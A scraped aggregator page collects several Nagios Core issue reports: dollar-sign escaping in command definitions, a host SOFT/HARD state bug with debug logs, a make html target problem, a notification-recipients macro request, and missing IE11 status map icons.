echo  'http://user:[email protected]/sumSeries(stats.example-com-*.action_controller.status.5*) -w 1 -c 5 -s 30

After a deep dive in the docs, the only indication I found that this might be illegal was http://nagios.sourceforge.net/docs/nagioscore/4/en/configmain.html#illegal_macro_output_chars

But I don't think that applies as it pertains to generated characters from macros rather than characters that might be interpreted as macros.

I tried escaping $ to no avail, e.g.

define command {                                                                             
    command_name check_graphite_data                                                         
    command_line echo 'http://user:pas\[email protected]/$ARG1$' -w $ARG2$ -c $ARG3$ -s $ARG4$
}

It turns out, to "fix" this is to have $$. I can find no documentation on escaping $ in a command_line and believe this to be a bug as well. To make the initial example "work", you would need:

define command {                                                                             
    command_name check_graphite_data                                                         
    command_line echo 'http://user:[email protected]/$ARG1$' -w $ARG2$ -c $ARG3$ -s $ARG4$
}

I fear some future person, probably myself, might attempt to fix this "typo".

nagios --version
Nagios Core 4.0.8

If this behavior is expected, please show me the relevant doc pages and close this issue.

HOST max_check_attempts set to 1 goes SOFT and then HARD, extra check is performed

Originally reported here http://support.nagios.com/forum/viewtopic.php?f=7&t=31262&p=126275#p125754

Nagios Core 4.0.8 on CentOS 6.5

With HOST object definitions, when the max_check_attempts is set to 1, when a host goes down, it enters a SOFT state first and then a HARD state, resulting in two checks performed instead of one.

SERVICE object definitions behave correctly.

Here is an extract from a nagios.debug demonstrating this behaviour:

HOST Up then Down then Up

[1423605101.333215] [016.0] [pid=14074] Scheduling a forced, active check of host 'centos01' @ Wed Feb 11 08:51:38 2015
[1423605101.333277] [008.0] [pid=14074] ** Timed Event ** Type: EVENT_HOST_CHECK, Run Time: Wed Feb 11 08:51:38 2015
[1423605101.333279] [008.0] [pid=14074] ** Host Check Event ==> Host: 'centos01', Options: 1, Latency: 0.000050 sec
[1423605101.338902] [016.1] [pid=14074] HOST: centos01, ATTEMPT=1/1, CHECK TYPE=ACTIVE, STATE TYPE=HARD, OLD STATE=0, NEW STATE=0
[1423605101.338911] [016.1] [pid=14074] Host was UP.
[1423605101.338917] [016.1] [pid=14074] Host is still UP.
[1423605101.338924] [016.1] [pid=14074] Pre-handle_host_state() Host: centos01, Attempt=1/1, Type=HARD, Final State=0 (UP)
[1423605101.339083] [016.1] [pid=14074] Post-handle_host_state() Host: centos01, Attempt=1/1, Type=HARD, Final State=0 (UP)
[1423605101.339297] [016.0] [pid=14074] Scheduling a non-forced, active check of host 'centos01' @ Wed Feb 11 08:56:41 2015

[1423605136.947174] [016.0] [pid=14074] Scheduling a forced, active check of host 'centos01' @ Wed Feb 11 08:52:10 2015
[1423605136.947324] [008.0] [pid=14074] ** Timed Event ** Type: EVENT_HOST_CHECK, Run Time: Wed Feb 11 08:52:10 2015
[1423605136.947329] [008.0] [pid=14074] ** Host Check Event ==> Host: 'centos01', Options: 1, Latency: 0.000134 sec
[1423605146.953117] [016.1] [pid=14074] HOST: centos01, ATTEMPT=1/1, CHECK TYPE=ACTIVE, STATE TYPE=HARD, OLD STATE=0, NEW STATE=1
[1423605146.953121] [016.1] [pid=14074] Host was UP.
[1423605146.953124] [016.1] [pid=14074] Host is now UP.
[1423605146.953134] [016.1] [pid=14074] Pre-handle_host_state() Host: centos01, Attempt=1/1, Type=SOFT, Final State=1 (DOWN)
[1423605146.953417] [016.1] [pid=14074] Post-handle_host_state() Host: centos01, Attempt=1/1, Type=SOFT, Final State=1 (DOWN)
[1423605146.953462] [016.0] [pid=14074] Scheduling a non-forced, active check of host 'centos01' @ Wed Feb 11 08:53:26 2015

[1423605206.929373] [008.0] [pid=14074] ** Timed Event ** Type: EVENT_HOST_CHECK, Run Time: Wed Feb 11 08:53:26 2015
[1423605206.929383] [008.0] [pid=14074] ** Host Check Event ==> Host: 'centos01', Options: 0, Latency: 0.000000 sec
[1423605209.933987] [016.1] [pid=14074] HOST: centos01, ATTEMPT=1/1, CHECK TYPE=ACTIVE, STATE TYPE=SOFT, OLD STATE=1, NEW STATE=1
[1423605209.934000] [016.1] [pid=14074] Host was DOWN.
[1423605209.934010] [016.1] [pid=14074] Host is still DOWN.
[1423605209.934031] [016.1] [pid=14074] Pre-handle_host_state() Host: centos01, Attempt=1/1, Type=HARD, Final State=1 (DOWN)
[1423605209.938604] [016.1] [pid=14074] Post-handle_host_state() Host: centos01, Attempt=1/1, Type=HARD, Final State=1 (DOWN)
[1423605209.938683] [016.0] [pid=14074] Scheduling a non-forced, active check of host 'centos01' @ Wed Feb 11 08:58:29 2015

[1423605294.255760] [016.0] [pid=14074] Scheduling a forced, active check of host 'centos01' @ Wed Feb 11 08:54:51 2015
[1423605294.255831] [008.0] [pid=14074] ** Timed Event ** Type: EVENT_HOST_CHECK, Run Time: Wed Feb 11 08:54:51 2015
[1423605294.255832] [008.0] [pid=14074] ** Host Check Event ==> Host: 'centos01', Options: 1, Latency: 0.000055 sec
[1423605294.259083] [016.1] [pid=14074] HOST: centos01, ATTEMPT=1/1, CHECK TYPE=ACTIVE, STATE TYPE=HARD, OLD STATE=1, NEW STATE=0
[1423605294.259085] [016.1] [pid=14074] Host was DOWN.
[1423605294.259086] [016.1] [pid=14074] Host experienced a HARD recovery (it's now UP).
[1423605294.259099] [016.1] [pid=14074] Pre-handle_host_state() Host: centos01, Attempt=1/1, Type=HARD, Final State=0 (UP)
[1423605294.259394] [016.1] [pid=14074] Post-handle_host_state() Host: centos01, Attempt=1/1, Type=HARD, Final State=0 (UP)


Service Up then Down then Up

[1423605375.013349] [016.0] [pid=15447] Scheduling a forced, active check of service 'SSH Server' on host 'centos01' @ Wed Feb 11 08:56:12 2015
[1423605375.042681] [016.1] [pid=15447] Service is OK.
[1423605375.042683] [016.1] [pid=15447] Service did not change state.
[1423605375.042711] [016.0] [pid=15447] Scheduling a non-forced, active check of service 'SSH Server' on host 'centos01' @ Wed Feb 11 09:01:15 2015

[1423605389.043332] [016.0] [pid=15447] Scheduling a forced, active check of service 'SSH Server' on host 'centos01' @ Wed Feb 11 08:56:23 2015
[1423605389.083359] [016.1] [pid=15447] Service is in a non-OK state!
[1423605389.083361] [016.1] [pid=15447] Host is currently UP, so we'll recheck its state to make sure...
[1423605389.083366] [001.0] [pid=15447] schedule_host_check()
[1423605389.083383] [016.0] [pid=15447] Scheduling a non-forced, active check of host 'centos01' @ Wed Feb 11 08:56:29 2015
[1423605389.083443] [016.1] [pid=15447] Current/Max Attempt(s): 1/1
[1423605389.083447] [016.1] [pid=15447] Service has reached max number of rechecks, so we'll handle the error...
[1423605389.083937] [016.0] [pid=15447] Scheduling a non-forced, active check of service 'SSH Server' on host 'centos01' @ Wed Feb 11 09:01:29 2015

[1423605431.622650] [016.0] [pid=15447] Scheduling a forced, active check of service 'SSH Server' on host 'centos01' @ Wed Feb 11 08:57:03 2015
[1423605431.665858] [016.1] [pid=15447] Service is OK.
[1423605431.665860] [016.1] [pid=15447] Service experienced a HARD RECOVERY.
[1423605431.666198] [016.0] [pid=15447] Scheduling a non-forced, active check of service 'SSH Server' on host 'centos01' @ Wed Feb 11 09:02:11 2015

Calling html target does nothing

$ ./configure
$ make html
make: 'html' is up to date.
$ cd html && make
... extracts angular, d3 ...

Why doesn't make html work? I'm using make-4.1.

[feature-request] Notification recipients

This reature was discussed here: http://support.nagios.com/forum/viewtopic.php?f=20&t=33430
In large companies will be very useful to know how recieved this notify except you: are you alone or not?
IT managers receives e-mail notifications about bussines-critical services and they want to know how will be invloved to reslove problem.
Could you please add to Nagios Core macro, that can be used for notification in the same way as $CONTACTNAME$ or $CONTACTGROUPMEMBERS$?

Status Map icons and online/offline status dots disappear in IE11

The Nagios 4.1.0rc1 Status Map icons in Internet Explorer 11 disappear as the map loads. This is after applying the fix discovered by estanley375 (#25). I have noticed that the statusmap_icon directive in the configuration files does not add the images to the map. Instead, the Status Map seems to use the icon_image directive; I don't know if this is intentional behavior or not.

I have icon_image directives in the config files, but since there were no icons displaying in IE11, I also added the statusmap_icon directive. Unfortunately, I am still unable to see any icons on the Status Map. Furthermore, I don't see any of the red/green dots on the map which indicate the host's online/offline status. I have tried resetting my browser, cleared temporary Internet files, cookies, etc., and unchecked the Compatibility View for intranet sites (I had an issue with this because IE11, by default, throws intranet websites into Compatibility View, and our Nagios server is hosted internally)... but still no luck. IE's Developer Tools has no helpful output either.

Here's the kicker: the images are loaded successfully and display for a brief second as the map expands from a single point into the full web (using the Circular Balloon display). So I tried to change the map display, and none of them display icons or dots... except for the Circular Markup! I'm not sure what could account for this difference between the map displays.

I had created a topic on the Nagios Support Forum, which can be referenced for further information: http://support.nagios.com/forum/viewtopic.php?f=34&t=33253

Here is a screenshot of the Circular Balloon display of the Status Map after it has finished loading completely. There are no icons or online/offline status dots:
no-icons-2

Here is a screenshot of the Status Map as it initially loads. You can see that the images are successfully called, but disappear when the map finishes loading, as in the screenshot above:
no-icons

Here is a screenshot of the Circular Markup display. This is the only display that shows the icons:
no-icons-3

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.